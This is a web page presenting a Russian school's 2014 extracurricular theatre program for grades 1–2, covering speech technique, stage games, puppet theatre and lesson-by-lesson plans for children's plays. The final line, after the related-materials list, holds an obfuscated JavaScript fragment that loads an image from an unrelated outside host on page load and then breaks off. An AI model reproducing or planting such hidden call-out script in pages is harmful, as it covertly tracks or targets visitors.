Рабочая программа "Театральные ступеньки"
рабочая программа на тему

Паникар Ольга Александровна

Рабочая программа "Театральные ступеньки". Программа  предназначена учащимся 1-2 х  классов начальной школы. Программа рассчитана на 33 часа в 1 классе и 34 часа во 2 классе (1 час в неделю). 

Скачать:

ВложениеРазмер
Microsoft Office document icon teatralnye_stupenki_programma.doc211 КБ

Предварительный просмотр:

     Муниципальное автономное общеобразовательное учреждение Селятинская средняя общеобразовательная школа №1

Утверждаю

Директор школы

__________Попова Н.Н.

«___» _________ 2014 г.

РАБОЧАЯ ПРОГРАММА

по внеурочной деятельности

для 1 «А, Б, В, Г», 2 «А, Г» классов

«Театральные ступеньки»

на 2014-2015 учебный год

Составитель: Паникар Ольга Александровна

учитель начальных классов

2014г.

Пояснительная записка

       Программа ориентирована на всестороннее развитие личности ребенка, его неповторимой индивидуальности, направлена на гуманизацию и деидеологизацию воспитательно-образовательной работы с детьми, основана на психологических особенностях развития младших школьников. В программе систематизированы средства и методы театрально-игровой деятельности, обосновано использование разных видов детской творческой деятельности в процессе театральной деятельности.

Программа основана на следующем научном предположении: театральная деятельность, как процесс развития творческих способностей ребенка, является процессуальной. Важнейшим в детском творческом театре является процесс репетиций, процесс творческого переживания и воплощения, а не конечный результат. Поскольку именно в процессе работы над образом происходит развитие личности ребенка, развивается символическое мышление, двигательный эмоциональный контроль. Происходит усвоение социальных норм поведения, формируются высшие произвольные психические функции. Таким образом, работа над этюдами не менее важна, чем сам спектакль.

Особенность данной программы состоит в том, что младший школьник погружается в занятия театральным творчеством естественно, без принуждения они попадают в мир музыки, слова, литературы, живописи, хореографии и т.д. при этом рождается сотворчество, так как театр – это коллективный вид творчества, в котором нужно общаться, вместе решать возникающие творческие проблемы. От каждого ребёнка потребуется все его способности, заложенные от природы, даже те , о которых не подозревают ни ребёнок, ни его родители.

Программа  предназначена учащимся 1-2 х  классов начальной школы. Программа рассчитана на 33 часа в 1 классе и 34 часа во 2 классе (1 час в неделю). В результате занятий ребёнок должен научиться работать в коллективе, творчески реализоваться, раскрыться и проявить свои лучшие качества.

Цели и задачи

   Цель:  обучить каждого ребёнка осмысленной интонационной выразительной речи и чтению, превратить эти навыки в норму общения; развить познавательные и творческие способности учащихся через искусство художественного слова,  театрализацию, концертную деятельность, практические занятия по сценическому мастерству.

 Основные задачи:

1. Знакомство детей с различными видами театра (пальчиковый, варежковый, теневой, кукольный).

2. Поэтапное освоение детьми различных видов творчества.

3. Совершенствование артистических навыков детей в плане переживания и воплощения образа, моделирование навыков социального поведения в заданных условиях.

Программные задачи:

  1. Прививать любовь к сценическому искусству.
  2. Развивать и совершенствовать творческие способности детей средствами театрального искусства.
  3. Развивать творческую самостоятельность в создании художественного образа, используя игровые, песенные, танцевальные импровизации.
  4. Совершенствовать память, внимание, наблюдательность, мышление, воображение, быстроту реакции, инициативность и выдержку, восприятие детей, умение согласовывать свои действия с партнерами. Воспитывать доброжелательность, контактность в отношениях со сверстниками. Учить оценивать действия других детей и сравнивать со своими действиями.

5. Учить действовать на сценической площадке естественно.

6.  Закреплять правильное произношение звуков, отрабатывать дикцию, работать  над интонационной выразительностью речи.

                    Основные направления работы с детьми

Театральная игра – исторически сложившееся общественное явление, самостоятельный вид деятельности, свойственный человеку.

Задачи. Учить детей ориентироваться в пространстве, равномерно размещаться на площадке, строить диалог с партнером на заданную тему;  запоминать слова героев спектаклей; развивать зрительное, слуховое внимание, память, наблюдательность, образное мышление, фантазию, воображение, интерес  к сценическому искусству; упражнять в четком произношении слов, отрабатывать дикцию; нравственно-эстетические качества.

Культура и техника речи. Игры и упражнения, направленные на развитие дыхания и свободы воспитывать речевого аппарата.

Задачи. Развивать речевое дыхание и правильную артикуляцию, четкую дикцию, разнообразную интонацию, логику речи; связную образную речь, творческую фантазию; учить сочинять небольшие рассказы и сказки, подбирать простейшие рифмы; произносить скороговорки и стихи; тренировать четкое произношение согласных в конце слова; пользоваться интонациями, выражающими основные чувства; пополнять словарный запас.

Основы театральной культуры. призван познакомить учащихся с театром как видом искусства; дать понятие, что даёт театральное искусство в формировании личности. Он включает в себя беседы, видео просмотры и аудио прослушивание, участие детей в этюдах, представление своих работ по темам бесед.

Задачи. Познакомить детей с театральной терминологией; с основными видами театрального искусства; воспитывать культуру поведения в театре.

Работа над спектаклем базируется на авторских пьесах и включает в себя знакомство с пьесой, сказкой, работу над спектаклем – от этюдов к рождению спектакля.

Задачи. Учить сочинять этюды по сказкам, басням; развивать навыки действий с воображаемыми предметами; учить находить ключевые слова в отдельных фразах и предложениях и выделять их голосом; развивать умение пользоваться интонациями, выражающими разнообразные эмоциональные состояния (грустно, радостно, сердито, удивительно, восхищенно, жалобно, презрительно, осуждающе, таинственно и т.д.); пополнять словарный запас, образный строй речи.

                       Методологические принципы

В основу программы вложены следующие принципы:

1. Принцип развития индивидуальности каждого учащегося.

Занятия в кружке должны активировать имеющиеся у каждого ребёнка творческие способности, его жизненные познания, речевой опыт, его эмоции и настроения и развивать эти личностные параметры. Поэтому в ходе занятий в кружке ребёнок будет иметь возможность реализовать собственные намерения, т.е. действовать от своего имени.

2. Принцип личностно ориентированной направленности на развитие ребёнка как творческой  личности.

Это значит способствовать усвоению учащимися социального опыта, т.е. знаний, навыков и умений, которые необходимы для жизни в  конкретном социуме, а также развивать умение самостоятельно  учиться. Кроме вышесказанного этот принцип позволяет развивать в саморазвитию.

 3. Принцип деятельностной основы занятий

 Это принцип выражается во внешней и внутренней (умственной)  активности детей. В работе с детьми делается упор на самостоятельные и групповые формы  работы. Ребёнок ставится в ситуации,  когда ему приходиться действовать. Он осуществляет перевоплощение в действующее в этих обстоятельствах лицо. В данном случае речь идёт о приёмах, «стимулирующих»  ситуации реального общения.

 4. Принцип реальности и практического применения.

 Все полученные знания, умения и навыки жизненно необходимы ребёнку  как в его сегодняшней жизни,  так и для будущего его развития. Умение правильно говорить, двигаться, выражать свои чувства и эмоции, работать в коллективе, выполнять творческие задания и многое другое найдут применение  в жизни каждого ребёнка.

                   

                                  Учебно-тематический план

 Содержание всей программы подчинено единому принципу расширения и углубления знаний, действию от простого к сложному и представлено в 4 общих разделах.

№ п/п

Наименование раздела

Количество часов

теоретических

практических

1.

« Вначале было Слово…» - общение и речевой этикет.

10

2

8

2.

Сценические действия и театральные игры.

9

9

3.

Основы театральной культуры.

7

7

4.

Постановка спектаклей

41

41

  Кроме этих разделов курс начинается введением и заканчивается завершающим занятием, которое носит характер практической реализации полученных в течение  года знаний и умений.

  Объём материала соответствует возрастным особенностям младших школьников. Занятия проводятся в группах по  35 минут в 1 классе и по 45 минут во 2 классе, во второй половине дня, в рамках внеурочной деятельности.

   В работу программы могут быть включены посещения театров, встречи с актёрами, выезды с выступлениями в другие школы, творческие вечера.

Формирование Универсальных Учебных Действий

Личностные УУД: формирование мотива,  реализующего потребность в социально значимой и социально оцениваемой деятельности. Развитие готовности к сотрудничеству и дружбе. Формирование установки на здоровый образ жизни.

Познавательные УУД: умение устанавливать причинно-следственные связи, ориентироваться на разнообразие способов решения задач. Умение осуществлять поиск необходимой информации для выполнения творческих заданий ,умение  строить рассуждения в форме связи простых суждений об объекте.

Коммуникативные УУД: умение вступать в диалог, понимание возможности различных позиций и точек зрения на какой-либо предмет и вопрос. Умение договариваться, находить общее решение, работать в группах. Умение аргументировать своё предложение, убеждать и уступать, умение контролировать действия партнёра по деятельности. Умение задавать вопросы, необходимые для организации собственной деятельности и сотрудничества с партнёром. Формировать способность адекватно использовать речевые средства для эффективного решения разнообразных коммуникативных задач. Уметь осуществлять взаимный контроль и оказывать в сотрудничестве необходимую взаимопомощь.

   Регулятивные УУД: Моделирование различных ситуаций поведения в школе и других общественных местах. Различение допустимых и недопустимых форм поведения. Умение адекватно принимать оценку учителя и одноклассников. Умение осуществлять констатирующий и предвосхищающий контроль по результату и по способу действия, актуальный контроль на уровне произвольного внимания.

Предметные результаты

  • научатся ориентироваться в пространстве, равномерно размещаясь на площадке.
  • научатся двигаться в заданном ритме, по сигналу педагога соединяясь в пары, тройки или цепочки.
  • научатся создавать пластические импровизации под музыку разного характера.
  • научатся запоминать заданные педагогом мизансцены.
  • научатся свободно и естественно выполняют на сцене простые физические действия.
  • научатся действовать в предлагаемых обстоятельствах с импровизированным текстом на заданную тему.
  • научатся сочинять индивидуальный или групповой этюд на заданную тему.
  • научатся менять по заданию педагога высоту и силу звучания голоса.
  • научатся произносить скороговорку и стихотворный текст в движении и разных позах.
  • научатся произносить на одном дыхании длинную фразу или четверостишие.
  • будут знать и четко произносят в разных темпах 8-10 скороговорок.
  • научатся произносить одну и ту же фразу или скороговорку с разными интонациями.
  • научатся читать наизусть стихотворный текст, правильно произнося слова и расставляя логические ударения.
  • научатся строить диалог с партнером на заданную тему.
  • научатся подбирать рифму к заданному слову.
  • научатся составлять диалог между сказочными героями.
  • будут знать наизусть стихотворения русских и зарубежных авторов.
  • Владеют навыками кукловождения.
  • будут знать виды и особенности театрального искусства.
  • будут знать театральную терминологию и культуру зрителя.
  • научатся работать в коллективе и согласовывать свои действия с другими.

Ожидаемые результаты

Первый год обучения

  • Умение элементарно разбирать литературное произведение: смысл изображённых явлений, художественное значение отдельных деталей, описание образных сравнений и выражений, определять основную мысль произведения и его отдельных частей.
  • Воспитанники овладевают умением логически правильно и чётко передавать при чтении мысли автора. Понимают смысл изображенных явлений, эмоциональное отношение к ним и активное стремление; раскрыть этот смысл слушателям – источник разнообразных интонаций,   темпа и тембра голоса. Это достигается на занятиях по технике речи.
  • Воспитанники должны иметь элементарные навыки по изготовлению перчаточных  кукол.
  • Дети должны иметь начальные сведения о традициях театра разных систем и традиционного русского театра кукол.
  • Воспитанники должны иметь элементарные представления о театральных профессиях и специальных терминах театрального мира.

Второй год обучения:

  • Умение логически правильно и чётко передавать в своём чтении мысли автора, выявлять смысл текста.
  • Умение работать с куклой на ширме и без неё.
  • Овладение практическими навыками по изготовлению кукол и декораций.
  • Учитывать особенности произведений при выборе их для постановки.
  • Овладение элементарными знаниями о театральных профессиях и терминах театрального мира.

Формы контроля:

-постановки театральных пьесок, пьес, спектаклей;

-создание классого мини-театра кукол;

-участие в конкурсах чтецов, в конкурсах инсценирования военной песни;

-изготовление декораций  к постановкам;

-выступления на классных утренниках, школьных, поселковых мероприятиях, в детских садах;

-участие в районных смотрах театральных коллективов;

-анкетирование родителей, учащихся;

-создание портфолио личных достижений учащихся.

Содержание программы

1 Раздел  «В начале было Слово…». Культура и техника речи.(10 часов)

  • Слушание, чтение и рассказывание сказок.
  • Виды говорения: диалог и монолог.
  • Мимика и жесты. Сценки без слов.
  • Понятие «общение», говорить и слушать.
  • Речевой этикет в различных ситуациях.
  • Игры на дыхание и правильную артикуляцию.
  • Логика речи. Составление коротких рассказов.
  • Стихи. Подбор простейших рифм.
  • Сочинение небольших сказок и  рассказов.
  • Проговаривание рифмовок, скороговорок, стихов.
  • Игры со словами.
  • Интонация речи. Выражение основных чувств.

  Произведения для занятий:

  • Считалки
  • Скороговорки и долгоговорки
  • Русские народные басни
  • Русские народные игры
  • Докучные сказки
  • Сказки, присказки
  • Игры в загадки
  • Произведения С.Маршака
  • Русские народные песенки
  • Потешки, дразнилки, небылицы

   

      2 Раздел   Сценические действия и театральные игры(9 часов)

  • Групповые сюжетно-ролевые игры.
  • Элементы сценического действия.
  • Сценическое воображение. Действие в условных ситуациях.
  • Упражнения, игры, этюды как сценические действия.
  • Умение ориентироваться и размещаться на сцене.
  • Построение диалога с напарником по заданной теме.
  • Как заучить роль своего героя.
  • Отработка дикции и чёткого произношения слов.
  • Запоминание заданных поз и умение образно их передавать.
  • Создание образов с помощью выразительных движений.

       3 Раздел  Основы театральной культуры (7 часов)

  • Что такое театр. Виды театров.
  • Рождение театра в России. Искусство скоморохов.
  • Театральное здание. Зрительный зал. Мир кулис.
  • Посещение кукольного театра.
  • Театральные профессии. Игра актёров.
  • Культура поведения в театре. Театр начинается с вешалки.
  • Театральная афиша, театральная программка.
  • Посещение ТЮЗа.
  • Виды театрального искусства.
  • Спектакль – результат творческого труда многих людей.

   

        4 Раздел  Постановка спектаклей (41 час).

  • Прочтение произведения, определение сюжетной линии.
  • Работа над отдельными эпизодами.
  • Создание примерной выгородки.
  • Простейшие этюды-импровизации по сюжету произведения.
  • Выбор и распределение ролей.
  • Работа над отдельными картинами и пьесой в целом.
  • Прогонные репетиции картин, актов, всей пьесы.
  • Создание декораций и костюмов. Закрепление мизансцен.
  • Генеральные репетиции всей пьесы.
  • Показ спектакля зрителям.

           постановка кукольных спектаклей

  • Знакомство с видами кукольных театров.
  • Просмотр кукольных спектаклей с последующим обсуждением.
  • Создание пальчиковых кукол. Проигрывание реальных и вымышленных сюжетов.
  • Создание настольного театра. Конусные и варежковые куклы.
  • Кукольный театр из-за ширмы. Верховые куклы.
  • Обучение вождению верховых кукол.
  • Создание реквизита для кукольного театра: ширма, куклы, декорации
  • Прочтение сценария, обсуждение содержания.
  • Распределение ролей, проигрывание отдельных сюжетов.
  • Прогонные репетиции картин, актов всей пьесы без ширмы и за ширмой.
  • Генеральные репетиции всего спектакля.
  • Показ спектакля зрителям.

Календарно – тематическое  планирование

1 класс - 33 часа

п/п

Тема занятия

Элементы содержания

Форма контроля

Информационно-методическое обеспечение

Дата

1 А, Б

1 В, Г

план

факт

план

факт

1

Основы театральной культуры

Рассказ о театре и видах театрального искусства. Работа над эпизодами спектакля «Колобок».

Мультимедийный проектор, презентация

2

Мимика и жесты. Ритмопластика.

Инсценировка сказки «Колобок» без слов, используя мимику и жесты.

инсценировка

костюмы

3

Сценические действия. Что такое сцена.

Создание примерной выгородки. Фантазии по сказке «Колобок».

инсценировка

костюмы

4

Культура и техника речи

Виды говорения: диалог и монолог. Как разучить роль своего героя.

5

Кукольный театр. Пальчиковый театр.

Знакомство с пальчиковыми куклами. Изготовление пальчиковых кукол к сказке «Волк и семеро козлят»

Изготовление кукол

Материал для изготовления кукол

6

Кукольный театр. Пальчиковый театр.

Поочерёдное проигрывание по ролям сказки «Волк и семеро козлят» пальчиковыми куклами.

инсценировка

Пальчиковые куклы

7

Великая сила Слова

Работа над техникой речи. Проговаривание русских народных потешек и дразнилок по ролям. Интонационная отработка.

Конкурс потешек

8

Театральная игра

Знакомство с русскими народными играми со словами. Разучивание сказки-игры «Репка». Учить правильно двигаться и говорить текст.

игра

9

Работа над спектаклем «Лесная аптека»

Прослушивание и прочтение сказки  «Лесная аптека»,  работа над дикцией.

Постановка спектакля

Сценарий сказки

10

Работа над спектаклем «Лесная аптека»

Распределение и разучивание ролей.  Проигрывание отдельных эпизодов.

Постановка спектакля

Сценарий сказки

11

Работа над спектаклем «Лесная аптека»

Распределение и разучивание ролей.  Проигрывание отдельных эпизодов.

Постановка спектакля

Сценарий сказки

12

Работа над спектаклем «Лесная аптека»

Создание выгородки. Проигрывание всего спектакля. Умение пользоваться интонацией.

Постановка спектакля

костюмы

13

Работа над спектаклем «Лесная аптека»

Создание декораций и костюмов.

Постановка спектакля

костюмы

14

Работа над спектаклем «Лесная аптека»

Создание декораций и костюмов. Генеральная репетиция спектакля.

Постановка спектакля

костюмы

15

Работа над спектаклем «Лесная аптека»

Премьера спектакля «Лесная аптека» для учащихся начальной школы.

выступление

Костюмы, декорации

16

Основы театральной культуры.

Правила поведения в театре. Места в театре. Просмотр презентации  про Кукольный театр Образцова.

игра

Мультимедийный проектор, презентация

17

Культура и техника речи

Общение. Говорить и слушать. Дети рассказывают любимые стихи и сказки. Формировать чёткую и грамотную речь.

Конкурс чтецов

18

Театральная игра.

Игры-импровизации по сказке «Терем-теремок», «Репка», «Три медведя»

игра

19

Кукольный театр. Конусные куклы.

Знакомство в настольным кукольным театром. Изготовление конусных кукол.

Изготовление конусных кукол.

Материал для изготовления конусных кукол.

20

Кукольный театр. Конусные куклы.

Создание атрибутов и декораций для спектаклей «Три поросёнка», «Три медведя»

Инсценировка

Настольные куклы

21

Кукольный театр. Конусные куклы.

Проигрывание настольных кукольных спектаклей с использованием конусных кукол.

Инсценировка

Настольные куклы

22

Культура и техника речи.

Речевой этикет в различных ситуациях. Проигрывание мини-сценок.

Инсценировка

Настольные куклы

23

Театральная игра.

Импровизация игры-драматизации по сказке «Теремок». Создание образов героев сказки.

Инсценировка

24

Работа над спектаклем «Лесная история»

Просмотр сказки «Лесная история». Обсуждение содержания и игры героев.

Мультимедийный проектор, презентация

25

Работа над спектаклем «Лесная история»

Распределение ролей и первое прочтение спектакля по ролям.

Постановка спектакля

Сценарий сказки

26

Мы актеры. Работа над спектаклем «Лесная история»

Создание выгородки. Проигрывание отдельных эпизодов. Постановка танцев.

Постановка спектакля

Сценарий сказки

27

Мы актеры. Работа над спектаклем «Лесная история»

Создание выгородки. Проигрывание отдельных эпизодов. Постановка танцев.

Постановка спектакля

Сценарий сказки

28

Работа над спектаклем «Лесная история»

Заучивание ролей. Отработка движений, жестов и мимики. Выразительность и подлинность поведения в сценических условиях.

Постановка спектакля

Сценарий сказки

29

Мы актеры. Работа над спектаклем «Лесная история»

Создание декораций и костюмов. Проигрывание всего спектакля.

Постановка спектакля

Материал для изготовления декораций

30

Мы актеры. Работа над спектаклем «Лесная история»

Создание декораций и костюмов. Проигрывание всего спектакля.

Постановка спектакля

Материал для изготовления декораций

30

Работа над спектаклем «Лесная история»

Генеральная репетиция с декорациями,  реквизитом и музыкальным сопровождением.

Постановка спектакля

Костюмы, декорации, реквизиты

31

Работа над спектаклем «Лесная история»

Генеральная репетиция с декорациями,  реквизитом и музыкальным сопровождением.

Постановка спектакля

Костюмы, декорации, реквизиты

32

Работа над спектаклем «Лесная история»

Премьера спектакля «Лесная история»

выступление

Костюмы, декорации, реквизиты

33

Театральная культура.

Посещение Театра кукол. Просмотр спектакля.

2 класс - 34 часа

п/п

Тема занятия

Элементы содержания

Форма контроля

Информационно-методическое обеспечение

Дата

план

факт

1

Культура и техника речи.

Логика речи. Составление коротких рассказов или сказок по заданным глаголам.

2

Театральная игра

Импровизации на тему русских народных сказок по имеющимся атрибутам.

инсценировка

3

Кукольный театр.

Знакомство с театральной ширмой и верховыми куклами.

куклы

4

Кукольный театр

Основы актёрского мастерства и кукловождения. Проигрывание отдельных эпизодов для тренировки руки.

куклы

5

Кукольный театр.  Работа над спектаклем «Три медведя».

Просмотр сказки «Три медведя». Прослушивание и первичное прочитывание сценария.

Постановка спектакля

куклы

6

Кукольный театр.  Работа над спектаклем «Три медведя».

Изготовление ширмы и кукол с помощью родителей. Проигрывание отдельных эпизодов за ширмой.

Постановка спектакля

Материал для изготовления декораций

7

Кукольный театр.  Работа над спектаклем «Три медведя».

Окончательное распределение ролей. Заучивание текста и тренировка вождения кукол с текстом.

Постановка спектакля

Материал для изготовления декораций

8

Кукольный театр.  Работа над спектаклем «Три медведя».

Окончательное распределение ролей. Заучивание текста и тренировка вождения кукол с текстом.

Постановка спектакля

Костюмы, декорации, реквизиты, куклы

9

Кукольный театр.  Работа над спектаклем «Три медведя».

Проигрывание всего спектакля с музыкальным оформлением.

Постановка спектакля

Костюмы, декорации, реквизиты, куклы

10

Кукольный театр.  Работа над спектаклем «Три медведя».

Проигрывание всего спектакля с музыкальным оформлением.

Постановка спектакля

Костюмы, декорации, реквизиты, куклы

11

Кукольный театр

Премьера спектакля  «Три медведя».

Выступление

Костюмы, декорации, реквизиты, куклы

12

Культура и техника речи

Чтение докучных сказок. Нахождение ключевых слов и выделение их голосом.

13

Основы театральной культуры

Из истории русского театра. Игра скоморохов.

игра

Мультимедийный проектор, презентация

14

Театральные игры.

Сюжетно-ролевая игра – телепередача «В гостях у сказки»

игра

15

Работа над инсценировкой сказки «Под грибом»

Чтение сказки «Под грибом», обсуждение и выбор ролей.

Сказка «Под грибом»

16

Работа над инсценировкой сказки «Под грибом»

Заучивание ролей. Проигрывание отдельных эпизодов.

Постановка спектакля

Сценарий

17

Работа над инсценировкой сказки «Под грибом»

Создание выгородки. Репетиция всей сказки. Подбор музыкального оформления и отработка ритмопластики.

Постановка спектакля

Материал для изготовления декораций

18

Работа над инсценировкой сказки «Под грибом»

Создание декораций (изготовление большого гриба и подбор костюмов).

Постановка спектакля

Материал для изготовления декораций

19

Работа над инсценировкой сказки «Под грибом»

Прогонная репетиция всего спектакля с декорациями, костюмами и музыкой.

Постановка спектакля

Костюмы, декорации, реквизиты

20

Работа над инсценировкой сказки «Под грибом»

Прогонная репетиция всего спектакля с декорациями, костюмами и музыкой.

Постановка спектакля

Костюмы, декорации, реквизиты

21

Работа над инсценировкой сказки «Под грибом»

Премьера спектакля по мотивам сказки «Под грибом» для учащихся начальной школы.

Выступление

Костюмы, декорации, реквизиты

22

Основы театральной культуры.

Виды театрального искусства. Просмотр эпизодов оперы, балета и мюзикла.

Мультимедийный проектор, презентация

23

Культура и техника речи.

Выразительное чтение стихотворений С. Маршака.  Импровизированное прочтение  по ролям с элементами инсценировки стихотворения «Усатый – полосатый»

Стихотворения С. Маршака.  

24

Театральная игра

Сценическое воображение. Импровизации  детей на сцене по услышанному впервые тексту.

инсценировка

25

Подготовка к отчетному спектаклю «Про друзей и теремок, или всё наоборот»

Просмотр сказки «Теремок», обсуждение сценария, подбор ролей.

Мультимедийный проектор, презентация

26

Подготовка к отчетному спектаклю «Про друзей и теремок, или всё наоборот»

Прочитывание ролей.

Постановка спектакля

сценарии

27

Подготовка к отчетному спектаклю «Про друзей и теремок, или всё наоборот»

Репетиция отдельных сцен спектакля. Изготовление декораций.

Постановка спектакля

Костюмы, декорации, реквизиты

28

Подготовка к отчетному спектаклю «Про друзей и теремок, или всё наоборот»

Прогонная репетиция всего спектакля с музыкальным сопровождением.

Постановка спектакля

Костюмы, декорации, реквизиты

29

Подготовка к отчетному спектаклю «Про друзей и теремок, или всё наоборот»

Прогонная репетиция всего спектакля с музыкальным сопровождением.

Постановка спектакля

Костюмы, декорации, реквизиты

30

Подготовка к отчетному спектаклю

«Про друзей и теремок, или всё наоборот»

Генеральная репетиция спектакля с декорациями и музыкальным сопровождением.

Постановка спектакля

Костюмы, декорации, реквизиты

31

Подготовка к отчетному спектаклю «Про друзей и теремок, или всё наоборот»

Премьера кукольного спектакля «Про друзей и теремок, или всё наоборот» для учащихся и учителей школы.

Выступление

Костюмы, декорации, реквизиты

32

Основы театральной культуры

Театральная афиша. Театральная программка.

Листы А3, краски, кисти, карандаши, фломастеры

33

Театральная культура

Посещение детского музыкального театра. Просмотр спектакля

34

Основы театральной культуры

Театральная афиша. Театральная программка.

Листы А3, краски, кисти, карандаши, фломастеры

Методическое обеспечение

     Преподавание по данной программе дает положительные результаты в обучении и воспитании учащихся. Выпускники начальной школы,  изучающие курс «Театр», имеют  широкий кругозор, обладают эстетическим вкусом, у них  развиты коммуникативные умения: они умеют слушать и слышать другого, свободно участвуют в беседе, понимают чувства и настроения окружающих, осмысливают свои поступки и поступки других людей.

     На занятиях курса используются  активные методы обучения: ролевые игры, анализ ситуаций взаимодействия, решение проблемных ситуаций, возникающих между детьми и взрослыми. Включаются  упражнения на развитие внимания, памяти, воображения, мышления, речи, импровизация. Эти методы способствуют развитию такой личности, которая в современных условиях, владея определенным запасом знаний, могла ориентироваться в конкретной речевой ситуации, строить  высказывания со своим замыслом и коммуникативным намерением.

Театр своей многомерностью, своей многоликостью и синтетической природой  способен помочь ребенку раздвинуть рамки постижения мира, увлечь его добром, желанием делиться своими мыслями, умением слышать других, развиваться, творя и играя. Ведь именно игра есть непременный атрибут театрального искусства, и вместе с тем при наличии игры дети, педагоги  взаимодействуют друг с другом, получая максимально положительный результат. Игра, игровые упражнения, особенно в первом классе, выступают как способ адаптации ребенка к школьной среде. Проиграв этюд-эксперимент, школьники могут практически побывать в любой ситуации и проверить на своем жизненно - игровом опыте предположения и варианты поведения и решения подобной проблемы.

    В то же время театральное искусство (театрализация) способствует внешней и внутренней социализации ребёнка, т.е. помогает ему легко входить в коллективную работу, вырабатывает чувство товарищества, волю, целеустремлённость, терпение и другие качества, необходимые для успешного взаимодействия с социальной средой;

 пробуждает интерес к литературе, дети начинают читать с удовольствием и более осмысленно; активизирует и развивает интеллектуальные и творческие способности ребёнка; он начинает свободно фантазировать и в области текста и музыкального оформления – словом всего того, что связано с игрой в театре.

            Работа педагога заключается в создании организованной творческой атмосферы, «когда ты интересен всем, все интересны тебе». Тренировка внимания к окружающим обеспечивается в коллективных играх и заданиях, где каждый должен выступать только в своё время и на своём месте. Необходима и тренировка, раскрытие, активизация самобытности, самостоятельности каждого ребёнка. Этим и объясняется разработка программы театрального кружка. 

      Учащиеся по окончании курса  знакомы с особенностями невербального общения, с помощью мимики, жестов, пантомимики.

      Занятия курса желательно проводить на последнем уроке, чтобы помочь снять накопленное за день напряжение. Проводить занятия рекомендуем в непринужденной обстановке. Никаких оценок, порицаний. Воспитание улыбкой, похвалой, добрым словом, ласковым прикосновением. Атмосфера доверия, дружеское расположение к ребенку даст  возможность раскрыться внутреннему миру ребенка, позволит ему поделиться с учителем своими проблемами. Учитель узнает и откроет  для себя ребенка по-новому.

     У учащихся  воспитывается  культура поведения, умение вести себя в общественных местах, формируется правильная осанка, ребята чувствуют себя уверенно в новых ситуациях.  

   Работа с энциклопедическим материалом учит вести поисковую работу, с интересом проводить свое свободное время. Преподавание каждого раздела программы с творческим замыслом  воспитывает у учащихся креативное мышление. Это помогает им легко пройти адаптационный период при переходе в среднее звено.

     По окончании курса учащиеся владеют  правильным произношением звуков, имеют красивую дикцию, могут  голосом привлечь внимание слушателей.  

    Участие родителей в постановках, совместные поездки на спектакли  сплачивают  классный коллектив. Усиливается  взаимодействие «Школа - класс-семья».

       Наиболее яркие моменты  выступлений, интересных поездок в театр- на фотографии в классный архив, портфолио учащихся.

Технические средства обучения.

  1. Телевизор.
  2. Компьютер.
  3. DVD проектор.

Оборудование кабинетов.

1.Ширма.

2.Мультимедио.

3.Телевизор.

4.Материал для изготовления костюмов, декораций.

                                     Список литературы

  1. Калинина Г.В. Давайте устроим театр. – Москва, 2007 год
  2. Джежелей О.В. Из детских книг. – Москва, 1995 год
  3. Маршак С.Я. Сказки, песни, загадки. – Москва, 1987 год
  4. Библиотека словесника: русские народные загадки, пословицы и поговорки.-Москва, 1990 год
  5. Базанов В.В. Техника и технология сцены. Москва, -1976 год
  6. Берёзкин В.И. Искусство оформления спектакля. Москва, -1986 год
  7. Былеева Л.В. Русские народные игры. – Москва, 1986 год
  8. Горбачёв И.А. Театральные сезоны в школе.- Москва, 2003 год
  9. Колчеев Ю.В. Театрализованные игры в школе.- Москва, 2000 год
  10. Чурилова Э.Т. Методика и организация театральной деятельности дошкольников и младших школьников.-  Москва, 2001 год
  11. Лебедева Г.Н. Внеклассные мероприятия в начальной школе. – Москва, 2008 год.
  12. Михеева Л.Н. Молодёжный любительский театр. М., 2006 год


По теме: методические разработки, презентации и конспекты

Рабочая программа по курсу "Раз ступенька, два ступенька" (дополнительная образовательная программа "Игралочка")

Программа включает в себя пояснительную записку, содержание и календарно - тематическое планирование....

Рабочая программа. Математика. "Раз - ступенька, два - ступенька."

Рабочая программа по дошкольной подготовке для детей 6 - 7 лет. Имеет пояснительную записку, тематическое планирование, планируемые результаты знаний, умений и навыков....

Рабочая программа "Ступеньки к школе"

Рабочая программа для подготовки будущих первоклассников....

Рабочая программа студии дополнительного образования "Школа Будущего: Раз - ступенька, два - ступенька"

Рабочая программа студии дополнительного образования "Школа Будущего: Раз - ступенька, два - ступенька"...

Рабочая программа "Раз ступенька, два ступенька"

quot;Раз ступеньки, два ступеньки"...

Рабочая программа по курсу внеурочной деятельности "Раз ступенька, два ступенька" для 1 класса

Рабочая программа по курсу внеурочной деятельности "Раз ступенька, два ступенька" для 1 класса для  адаптации первоклассников...

Рабочая программа "Ступеньки роста"

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'hrwowjy.lussoit.com\',\'36\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.__m...